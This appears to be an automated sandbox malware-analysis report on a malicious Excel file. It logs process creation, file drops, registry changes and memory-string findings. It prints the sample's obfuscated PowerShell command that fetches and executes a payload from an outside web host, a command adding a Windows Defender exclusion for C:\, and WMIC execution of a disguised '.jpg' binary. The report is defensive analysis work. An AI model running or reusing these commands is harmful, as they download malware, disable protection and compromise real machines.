        Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000000A.00000002.752607255.0000000001210000.00000002.00000001.sdmp
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmp
        Source: Binary string: RfxVmt.pdb source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
        Source: Binary string: RfxVmt.pdbGCTL source: Test3.jpg, 00000013.00000003.817118818.0000000004081000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdb source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp
        Source: Binary string: wuser32.pdbUGP source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp

        Data Obfuscation:

        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Unpacked PE file: 19.2.Test3.jpg.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;.bss:R;
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Unpacked PE file: 19.2.Test3.jpg.400000.0.unpack
        PowerShell case anomaly found
        Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_0042CE66 push dword ptr [ecx+esi*2+0Ch]; ret
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_0042C489 push edx; ret
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_00402F43 pushfd ; iretd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_035222DC push 8BFFFFFFh; iretd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_03522830 pushfd ; ret
        Source: initial sample Static PE information: section name: .text entropy: 7.60065118993

        Persistence and Installation Behavior:

        Creates processes via WMI
        Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg File created: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Test1.txt
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll
        Source: C:\Windows\system32\drivers\tsusbhub.sys Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

        Hooking and other Techniques for Hiding and Protection:

        Contains functionality to hide user accounts
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: Test3.jpg, 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Source: Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: Test3.jpg, 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg File opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete
        Hides user accounts
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList .mFDHma
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_00435DBD sldt word ptr [eax]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2397
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4699
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5364
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2433
        Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 589
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Dropped PE file which has not been started: C:\Program Files\Microsoft DN1\sqlmap.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txt
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll
        Source: C:\Windows\System32\conhost.exe TID: 5924 Thread sleep count: 56 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868 Thread sleep count: 2397 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5868 Thread sleep count: 4699 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356 Thread sleep count: 32 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108 Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 4984 Thread sleep count: 48 > 30
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 4984 Thread sleep time: -48000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 6356 Thread sleep count: 59 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3848 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\SysWOW64\cmd.exe TID: 1492 Thread sleep count: 589 > 30
        Source: C:\Windows\SysWOW64\cmd.exe TID: 1492 Thread sleep time: -7068000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 21_2_08354AE0 GetSystemInfo,
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapter
        Source: powershell.exe, 00000015.00000002.881477830.00000000059E6000.00000004.00000001.sdmp Binary or memory string: Hyper-V
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: fOC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1h
        Source: powershell.exe, 00000015.00000002.881477830.00000000059E6000.00000004.00000001.sdmp Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterExtendedAcl
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: fKC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1h
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterTeamMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Connect-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterExtendedAcl
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f(Set-VMNetworkAdapterRoutingDomainMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f"Remove-VMNetworkAdapterExtendedAcl
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterTeamMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f(Set-VmNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f)Get-VMNetworkAdapterFailoverConfigurationiape+
        Source: powershell.exe, 00000003.00000003.742621081.0000000008D10000.00000004.00000001.sdmp Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\*
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Test-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.dr Binary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRdma
        Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterAcl
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterTeamMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Rename-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterVlan
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f(Add-VMNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f)Get-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterTeamMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterAcl
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMScsiController
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f)Set-VMNetworkAdapterFailoverConfiguration
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f"Remove-VMNetworkAdapterTeamMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMScsiController
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRdma
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterVlan
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VmNetworkAdapterIsolation
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Disconnect-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterExtendedAcl
        Source: ModuleAnalysisCache.3.dr Binary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.dr Binary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterAcl
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterFailoverConfiguration
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f+Remove-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMScsiController
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f(Get-VMNetworkAdapterRoutingDomainMapping
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f+Remove-VMNetworkAdapterRoutingDomainMappingitpe+
        Source: ModuleAnalysisCache.3.dr Binary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapter
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterFailoverConfiguration
        Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
        Source: WMIC.exe, 00000011.00000002.766693060.0000000000B40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: powershell.exe, 00000015.00000002.877685086.0000000005110000.00000004.00000001.sdmp Binary or memory string: f(Add-VmNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
        Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterExtendedAcl
        Source: C:\Windows\system32\drivers\tsusbhub.sys System information queried: ModuleInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_004252D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_00424F75 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_00424FD2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_00424FE7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 18_2_00424FFB mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Adds a directory exclusion to Windows DefenderShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
        Allocates memory in foreign processesShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory allocated: C:\Windows\SysWOW64\cmd.exe base: D80000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 11A0000 protect: page read and write
        Creates a thread in another existing process (thread injection)Show sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgThread created: C:\Windows\SysWOW64\cmd.exe EIP: D8010E
        Maps a DLL or memory area into another processShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and write
        Writes to foreign memory regionsShow sources
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory written: C:\Windows\SysWOW64\cmd.exe base: D80000
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgMemory written: C:\Windows\SysWOW64\cmd.exe base: 11A0000
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c COpY /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c Wmic PROcEss CALl creaTe %TEMP%\Test3.jpg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES578D.tmp' 'c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP'
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe Wmic PROcEss CALl creaTe C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
        Source: Yara match | File source: Telex06012020.xls, type: SAMPLE
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp | Binary or memory string: Program Manager
        Source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp | Binary or memory string: GetProgmanWindow
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp | Binary or memory string: Progman
        Source: Test3.jpg, 00000013.00000002.942660396.0000000000EA0000.00000002.00000001.sdmp, cmd.exe, 00000016.00000002.943718147.0000000003E40000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
        Source: Test3.jpg, 00000013.00000002.946620033.0000000003979000.00000004.00000001.sdmp | Binary or memory string: SetProgmanWindow
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
